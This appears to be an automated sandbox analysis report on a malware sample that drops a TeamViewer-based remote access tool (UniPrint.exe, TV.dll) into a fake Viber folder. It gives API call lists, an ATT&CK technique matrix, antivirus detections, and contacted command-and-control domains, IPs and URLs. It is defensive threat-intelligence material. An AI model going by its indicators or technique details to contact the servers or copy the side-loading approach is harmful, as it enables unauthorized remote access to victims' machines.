Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,73D5A680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (2) | Windows Management Instrumentation (11) | DLL Side-Loading (11) | DLL Side-Loading (11) | Deobfuscate/Decode Files or Information (1) | Input Capture (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Native API (1) | DLL Search Order Hijacking (2) | DLL Search Order Hijacking (2) | Obfuscated Files or Information (2) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Screen Capture (1) | Exfiltration Over Bluetooth | Encrypted Channel (21) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Service Execution (12) | Create Account (1) | Valid Accounts (2) | Software Packing (1) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Input Capture (1) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Valid Accounts (2) | Access Token Manipulation (21) | DLL Side-Loading (11) | NTDS | System Information Discovery (26) | Distributed Component Object Model | Clipboard Data (1) | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Windows Service (22) | Windows Service (22) | DLL Search Order Hijacking (2) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Registry Run Keys / Startup Folder (1) | Process Injection (12) | Masquerading (1) | Cached Domain Credentials | Security Software Discovery (341) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder (1) | Valid Accounts (2) | DCSync | Virtualization/Sandbox Evasion (11) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (11) | Proc Filesystem | Process Discovery (2) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection (12) | Network Sniffing | Remote System Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | |

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
wogZe27GBB.exe | 54% | Virustotal | -
wogZe27GBB.exe | 9% | Metadefender | -
wogZe27GBB.exe | 62% | ReversingLabs | Win32.Worm.AutoRun

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll | 6% | Metadefender | -
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll | 51% | ReversingLabs | Win32.Trojan.Phonzy
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll | 0% | Metadefender | -
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | 0% | Metadefender | -
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | 0% | ReversingLabs | -

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.wogZe27GBB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2
0.0.wogZe27GBB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
widolapsed.info | 45.153.241.148 | true | false | - | high
master13.teamviewer.com | 185.188.32.23 | true | false | - | high
ping3.dyngate.com | unknown | unknown | false | - | high

        Contacted URLs


                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.teamviewer.com/download/version_4x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                              high
                              http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                high
                                http://www.teamviewer.com/help/support.aspxKwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                  high
                                  https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiUniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmpfalse
                                    high
                                    https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMXUniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.sectigo.com0wogZe27GBB.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002uUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                      high
                                      http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://corp.roblox.com/contact/svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                        high
                                        https://widolapsed.info/B8C631A8/.iUniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.PhotUniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.teamviewer.com/download/version_5x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                            high
                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#wogZe27GBB.exefalse
                                            • URL Reputation: safe
                                            unknown
                                            https://widolapsed.info/8C631A8/ELBASE.dll.mui01UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.TeamViewer.com/helpwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                              high
                                              http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://188.172.235.146/UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://188.172.235.146/EMUniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpfalse
                                                high
                                                http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.TeamViewer.com/downloadwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                  high
                                                  http://www.TeamViewer.comUniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                    high
                                                    https://widolapsed.info/B8C631A8/8UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://mastr13.teamvUniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001sUniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023vUniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.TeamViewer.com#http://www.TeamViewer.com/licensingwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                          high
                                                          http://www.teamviewer.com/ja/company/shutdown.aspx?version=UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://en.help.roblox.com/hc/en-ussvchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzmUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoUniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmpfalse
                                                                    high
                                                                    http://go.teamviewer.comn0wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventuresvchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.teamviewer.com/help/connectivity.aspx:wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                        high
                                                                        https://displaycatalog.m(svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://sectigo.com/CPS0wogZe27GBB.exefalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellowUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.teamviewer.com/favicon.icowogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                            high
                                                                            https://widolapsed.info/UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.roblox.com/developsvchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://crl.verisign.corl0UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://188.172.235.146/dout.aspx?s=12251267&p=10000002&clientUniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://crl.ver)svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              low
                                                                              https://widolapsed.info/B8C631A8/BUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
  Source: wogZe27GBB.exe; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
https://widolapsed.info/B8C631A8/(c~
  Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
https://www.tiktok.com/legal/report/feedback
  Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
http://nsis.sf.net/NSIS_ErrorError
  Source: wogZe27GBB.exe; Malicious: false; Reputation: high
https://corp.roblox.com/parents/
  Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp; Malicious: false; Reputation: high
https://www.verisign.c
  Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://www.teamviewer.com/download/beta.aspx
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
http://www.teamviewer.com
  Source: nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
  Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://www.teamviewer.com/licensing/commercialuse.aspx
